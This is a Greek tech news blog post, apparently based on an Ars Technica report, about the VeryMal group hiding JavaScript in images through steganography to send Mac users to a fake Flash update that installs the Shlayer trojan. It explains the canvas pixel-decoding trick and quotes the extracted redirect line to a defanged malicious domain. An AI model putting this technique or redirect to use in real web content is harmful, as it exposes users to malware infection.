Site Tools: Change WAG54G AnnexB | Εγκατάσταση DM500s posts | DM500s Images | Gemini 4.70 GSF posts | Unlock Thomson 585v6

 



Χρήση στεγανογραφίας σε εικόνες, για την μόλυνση Mac με trojan



Σύμφωνα με  το Arstechnica το διάστημα μεταξύ 11 και 13 Ιανουαρίου, έγινε μια μεγάλη κυβερνοεπίθεση με στόχο υπολογιστές Mac, στην οποία το γκρουπ VeryMal, χρησιμοποίησε στεγανογραφία για να "κρύψει" κώδικα JavaScript σε εικόνες, με στόχο να ξεγελάσει τους χρήστες και να εγκαταστήσει trojan. Οι μολυσμένες εικόνες προσπελάστηκαν με ρυθμό 5 εκατομμύρια φορές την ημέρα.

Όταν η εικόνα εμφανιζόταν σε σύστημα με αποκλειστικά Mac fonts, κάθε pixel της, μετατρεπόταν στον αντίστοιχο αλφαριθμητικό χαρακτήρα του. Στην συνέχεια ανακατεύθυνε τον χρήστη σε site που εμφάνιζε πως ο Flash player θέλει αναβάθμιση. Στην περίπτωση που ο χρήστης έκανε το λάθος να κάνει εγκατάσταση, μολυνόταν με το trojan Shlayer.
The image, which is displayed to the right of this text, looked unremarkable. Using some clever HTML5 programming under the hood, however, it delivered malicious code to unsuspecting Mac users. VeryMal created a canvas object, which developers use to render or enhance graphics. If the computer had Mac-specific fonts installed, the object would then loop through the underlying data in the image file and convert an individual pixel in each loop into an alphanumeric character. After adding each newly extracted character to a text string, it looked like this:
Κώδικας:
top.location.href =’hxxp://veryield-malyst.com/’ + volton + ‘?var1=’ + wsw;
[via]

Labels: , , ,

0 Comments:

Post a Comment

<< Home